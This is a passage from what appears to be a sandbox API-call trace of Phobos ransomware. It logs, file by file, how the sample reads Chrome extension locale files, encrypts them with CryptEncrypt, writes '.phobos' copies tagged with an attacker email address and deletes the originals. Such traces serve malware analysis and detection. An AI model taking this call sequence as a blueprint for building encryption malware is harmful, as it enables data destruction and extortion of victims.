returned 1 [0148.209] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0148.209] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0148.209] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0148.209] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.209] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0148.209] CryptDestroyKey (hKey=0xa32d68) returned 1 [0148.209] CloseHandle (hObject=0x138) returned 1 [0148.209] CloseHandle (hObject=0x18c) returned 1 [0148.209] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png")) returned 1 [0148.210] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0148.210] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0148.211] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=257) returned 1 [0148.211] CloseHandle (hObject=0x18c) returned 1 [0148.211] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json")) returned 0x2020 [0148.211] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.211] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0148.211] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0148.211] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0148.211] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0148.212] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0148.212] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0148.212] ReadFile (in: hFile=0x18c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x101, lpOverlapped=0x0) returned 1 [0148.212] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110, dwBufLen=0x110 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110) returned 1 [0148.212] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x110, lpOverlapped=0x0) returned 1 [0148.214] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0148.214] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0148.214] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0148.214] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.214] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0148.214] CryptDestroyKey (hKey=0xa32d68) returned 1 [0148.214] CloseHandle (hObject=0x18c) returned 1 [0148.214] CloseHandle (hObject=0x138) returned 1 [0148.216] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json")) returned 1 [0148.217] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0148.217] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0148.217] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=272) returned 1 [0148.217] CloseHandle (hObject=0x138) returned 1 [0148.217] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json")) returned 0x2020 [0148.217] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.217] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0148.217] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0148.218] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0148.218] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0148.218] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0148.218] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0148.218] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x110, lpOverlapped=0x0) returned 1 [0148.220] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x120, dwBufLen=0x120 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x120) returned 1 [0148.220] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x120, lpOverlapped=0x0) returned 1 [0148.221] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0148.221] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0148.221] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0148.221] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.221] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0148.221] CryptDestroyKey (hKey=0xa32d68) returned 1 [0148.221] CloseHandle (hObject=0x138) returned 1 [0148.221] CloseHandle (hObject=0x18c) returned 1 [0148.221] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json")) returned 1 [0148.222] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0148.222] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0148.223] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=224) returned 1 [0148.223] CloseHandle (hObject=0x18c) returned 1 [0148.223] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json")) returned 0x2020 [0148.223] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0148.223] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0148.223] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0148.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0148.225] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0148.225] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0148.225] ReadFile (in: hFile=0x18c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xe0, lpOverlapped=0x0) returned 1 [0148.226] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0, dwBufLen=0xf0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0) returned 1 [0148.226] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf0, lpOverlapped=0x0) returned 1 [0148.228] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0148.228] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0148.228] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0148.228] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.228] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0148.228] CryptDestroyKey (hKey=0xa32d68) returned 1 [0148.228] CloseHandle (hObject=0x18c) returned 1 [0148.228] CloseHandle (hObject=0x138) returned 1 [0148.228] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json")) returned 1 [0148.229] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0148.229] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0148.229] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=224) returned 1 [0148.229] CloseHandle (hObject=0x138) returned 1 [0148.230] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json")) returned 0x2020 [0148.230] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.230] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0148.230] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0148.230] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0148.230] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0148.230] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0148.230] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0148.230] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xe0, lpOverlapped=0x0) returned 1 [0148.231] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0, dwBufLen=0xf0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0) returned 1 [0148.231] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf0, lpOverlapped=0x0) returned 1 [0148.232] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0148.232] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0148.232] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0148.232] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.232] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0148.232] CryptDestroyKey (hKey=0xa32d68) returned 1 [0148.232] CloseHandle (hObject=0x138) returned 1 [0148.233] CloseHandle (hObject=0x18c) returned 1 [0148.233] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\messages.json")) returned 1 [0148.234] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0148.234] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0148.234] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x2a0fb08 | out: 